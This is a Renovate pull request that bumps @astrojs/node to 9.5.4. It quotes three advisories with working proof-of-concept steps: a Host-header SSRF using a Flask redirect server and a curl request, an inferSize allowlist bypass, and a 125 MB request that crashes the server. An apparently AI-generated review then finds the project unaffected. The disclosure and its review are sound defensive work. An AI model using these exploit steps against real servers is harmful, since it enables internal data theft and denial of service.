chore(deps): update dependency @astrojs/node to v9.5.4 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@astrojs/node (source)	9.5.2 → 9.5.4

GitHub Vulnerability Alerts

CVE-2026-25545

Summary

Server-Side Rendered pages that return an error with a prerendered custom error page (eg. 404.astro or 500.astro) are vulnerable to SSRF. If the Host: header is changed to an attacker's server, it will be fetched on /500.html and they can redirect this to any internal URL to read the response body through the first request.

Details

The following line of code fetches statusURL and returns the response back to the client:

https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534

statusURL comes from this.baseWithoutTrailingSlash, which is built from the Host: header. prerenderedErrorPageFetch() is just fetch(), and follows redirects. This makes it possible for an attacker to set the Host: header to their server (eg. Host: attacker.tld), and if the server still receives the request without normalization, Astro will now fetch http://attacker.tld/500.html.

The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.

Looking at the vulnerable code, the way to reach this is if the renderError() function is called (error response during SSR) and the error page is prerendered (custom 500.astro error page). The PoC below shows how a basic project with these requirements can be set up.

Note: Another common vulnerable pattern for 404.astro we saw is:

return new Response(null, {status: 404});

Also, it does not matter what allowedDomains is set to, since it only checks the X-Forwarded-Host: header.

https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146

PoC

1. Create a new empty project

npm create astro@latest poc -- --template minimal --install --no-git --yes

2. Create poc/src/pages/error.astro which throws an error with SSR:

---
export const prerender = false;

throw new Error("Test")
---

3. Create poc/src/pages/500.astro with any content like:

<p>500 Internal Server Error</p>

4. Build and run the app

cd poc
npx astro add node --yes
npm run build && npm run preview

5. Set up an "internal server" which we will SSRF to. Create a file called ssrf.txt and host it locally on http://localhost:8000:

cd $(mktemp -d)
echo "SECRET CONTENT" > ssrf.txt
python3 -m http.server

6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:

# pip install Flask
from flask import Flask, redirect

app = Flask(__name__)

@​app.route("/500.html")
def exploit():
    return redirect("http://127.0.0.1:8000/ssrf.txt")

if __name__ == "__main__":
    app.run()

7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT".

$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'
HTTP/1.1 500 OK
content-type: text/plain
date: Tue, 03 Feb 2026 09:51:28 GMT
last-modified: Tue, 03 Feb 2026 09:51:09 GMT
server: SimpleHTTP/0.6 Python/3.12.3
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

SECRET CONTENT

Impact

An attacker who can access the application without Host: header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.

For this to be vulnerable, a common feature needs to be used, with direct access to the server (no proxies).

CVE-2026-27829

Summary

A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.

Details

Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.

PoC

Details

Setup

Create a new Astro project with the following files:

package.json:

{
  "name": "poc-ssrf-infersize",
  "private": true,
  "scripts": {
    "dev": "astro dev --port 4322",
    "build": "astro build"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@​astrojs/node": "9.5.3"
  }
}

astro.config.mjs — only localhost:9000 is authorized:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  image: {
    remotePatterns: [
      { hostname: 'localhost', port: '9000' }
    ]
  }
});

internal-service.mjs — simulates an internal service on a non-allowlisted host (127.0.0.1:8888):

import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);
  res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
  res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));

src/pages/test.astro:

---
import { getImage } from 'astro:assets';

const result = await getImage({
  src: 'http://127.0.0.1:8888/internal-api',
  inferSize: true,
  alt: 'test'
});
---
<html><body>
  <p>Width: {result.options.width}, Height: {result.options.height}</p>
</body></html>

Steps to reproduce

1. Run npm install and start the internal service:

node internal-service.mjs

2. Start the dev server:

npm run dev

3. Request the page:

curl http://localhost:4322/test

4. internal-service.mjs logs Received: GET /internal-api — the request was sent to 127.0.0.1:8888 despite only localhost:9000 being in the allowlist.

Impact

Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.

CVE-2026-27729

Summary

Astro server actions have no default request body size limit, which can lead to memory exhaustion DoS. A single large POST to a valid action endpoint can crash the server process on memory-constrained deployments.

Details

On-demand rendered sites built with Astro can define server actions, which automatically parse incoming request bodies (JSON or FormData). The body is buffered entirely into memory with no size limit — a single oversized request is sufficient to exhaust the process heap and crash the server.

Astro's Node adapter (mode: 'standalone') creates an HTTP server with no body size protection. In containerized environments, the crashed process is automatically restarted, and repeated requests cause a persistent crash-restart loop.

Action names are discoverable from HTML form attributes on any public page, so no authentication is required.

PoC

Details

Setup

Create a new Astro project with the following files:

package.json:

{
  "name": "poc-dos",
  "private": true,
  "scripts": {
    "build": "astro build",
    "start:128mb": "node --max-old-space-size=128 dist/server/entry.mjs"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@​astrojs/node": "9.5.3"
  }
}

astro.config.mjs:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
});

src/actions/index.ts:

import { defineAction } from 'astro:actions';
import { z } from 'astro:schema';

export const server = {
  echo: defineAction({
    input: z.object({ data: z.string() }),
    handler: async (input) => ({ received: input.data.length }),
  }),
};

src/pages/index.astro:

---
---
<html><body><p>Server running</p></body></html>

crash-test.mjs:

const payload = JSON.stringify({ data: 'A'.repeat(125 * 1024 * 1024) });

console.log('Sending 125 MB payload...');
try {
  const res = await fetch('http://localhost:4321/_actions/echo', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
    body: payload,
  });
  console.log('Status:', res.status);
} catch (e) {
  console.log('Server crashed:', e.message);
}

Reproduction

npm install && npm run build

# Terminal 1: Start server with 128 MB memory limit
npm run start:128mb

# Terminal 2: Send 125 MB payload
node crash-test.mjs

The server process crashes with FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory. The payload is buffered entirely into memory before any validation, exceeding the 128 MB heap limit.

Impact

Allows unauthenticated denial of service against SSR standalone deployments using server actions. A single oversized request crashes the server process, and repeated requests cause a persistent crash-restart loop in containerized environments.

---

Release Notes

withastro/astro (@​astrojs/node)

v9.5.4

Compare Source

Patch Changes

• #​15564 522f880 Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15572 ef851bf Thanks @​matthewp! - Upgrade astro package support

  astro@​5.17.3 includes a fix to prevent Action payloads from exhausting memory. @​astrojs/node now depends on this version of Astro as a minimum requirement.

v9.5.3

Compare Source

Patch Changes

• c13b536 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

Renovate PR Review Results

⚖️ Safety Assessment: ✅ Safe

🔍 Release Content Analysis

This security update addresses three critical vulnerabilities (CVE-2026-25545, CVE-2026-27829, CVE-2026-27729) in the @astrojs/node adapter:

Version Updates:

• @astrojs/node: 9.5.2 → 9.5.4 (skipping 9.5.3)
• Minimum Astro peer dependency: ^5.14.3 → ^5.17.3

Security Fixes:

1. CVE-2026-25545 (SSRF via Host Header Injection)

   • Version 9.5.3 fix: Improved error page loading to read from disk first before falling back to configured host
   • Impact: Prevented attackers from manipulating the Host: header to fetch arbitrary internal URLs through custom error pages (404.astro, 500.astro)
   • Attack vector: SSR pages with prerendered custom error pages

2. CVE-2026-27829 (Image Domain Bypass via inferSize)

   • Addressed in Astro 5.17.3 (now required as peer dependency)
   • Impact: Prevented bypassing image.domains/image.remotePatterns restrictions when using inferSize option
   • Attack vector: SSRF against unauthorized remote hosts including cloud metadata endpoints

3. CVE-2026-27729 (Memory Exhaustion DoS)

   • Version 9.5.4 fix: Added default body size limit for server actions
   • Impact: Prevented memory exhaustion attacks from oversized POST requests to server action endpoints
   • Attack vector: Unauthenticated DoS via single large payload to action endpoints

No Breaking Changes:

• Both patches are backward compatible
• No API changes or configuration modifications required
• Purely defensive security enhancements

🎯 Impact Scope Investigation

Codebase Configuration:

• Output mode: static (astro.config.ts:57)
• Adapter: @astrojs/node with mode: 'standalone' (astro.config.ts:58-60)
• Current Astro version: 5.16.15 (below the new minimum requirement of 5.17.3)

Vulnerability Exposure Assessment:

✅ CVE-2026-25545 (SSRF): NOT VULNERABLE

• Requires SSR mode (output: 'server' or output: 'hybrid')
• This project uses output: 'static' - all pages are pre-rendered at build time
• Custom 404.astro exists (src/pages/404.astro) but is statically generated
• No server-side error handling at runtime

✅ CVE-2026-27829 (Image SSRF): NOT VULNERABLE

• Requires inferSize option with remote images
• No usage of inferSize found in codebase (Grep search confirmed)
• Images are served via Cloudflare R2 CDN with pre-configured URLs
• No dynamic remote image fetching at runtime

✅ CVE-2026-27729 (DoS): NOT VULNERABLE

• Requires server actions (defineAction)
• No server actions found in codebase (Grep search confirmed)
• Static site has no runtime server action endpoints

Dependency Analysis:

• Direct dependency: @astrojs/node specified as ^9.4.6 in package.json:28
• Current Astro version (5.16.15) is below new peer dependency requirement (^5.17.3)
• Note: This will not cause installation issues because:
  • The adapter is configured but unused in static mode
  • Peer dependency warnings are non-blocking
  • The project successfully builds as a static site

Files Reviewed:

• astro.config.ts (confirmed static mode)
• package.json (dependency versions)
• src/pages/404.astro (static error page)
• All .astro files (no SSR pages with prerender: false)
• No server actions or inferSize usage detected

💡 Recommended Actions

Immediate Action:
✅ SAFE TO MERGE - This PR can be merged immediately without code changes.

Rationale:

1. The project is not vulnerable to any of the patched CVEs due to static site architecture
2. The update is a pure security patch with no breaking changes
3. No API changes or configuration modifications required
4. Peer dependency mismatch (Astro 5.16.15 vs required 5.17.3) is non-critical for this static site

Optional Follow-up:

• Consider updating Astro to 5.17.3+ in a future PR to satisfy the peer dependency requirement
• This is not urgent as the adapter is configured but essentially unused in static mode
• The current setup will continue to work without issues

Testing Recommendation:

• Run pnpm build after merge to verify the static build process remains functional
• No runtime testing needed (static output only)

🔗 Reference Links

• Release: @astrojs/node@9.5.4
• Release: @astrojs/node@9.5.3
• CVE-2026-25545: SSRF Advisory
• CVE-2026-27829: Image Domain Bypass
• CVE-2026-27729: Memory Exhaustion DoS

Generated by koki-develop/claude-renovate-review

[github-actions]

🚀 Preview deployment ready!

✅ Preview URL: https://pr-1311---web-njpdbbjcea-an.a.run.app
📝 Commit SHA: ffe0933 (view commit)

This comment was automatically generated by the deploy-preview workflow.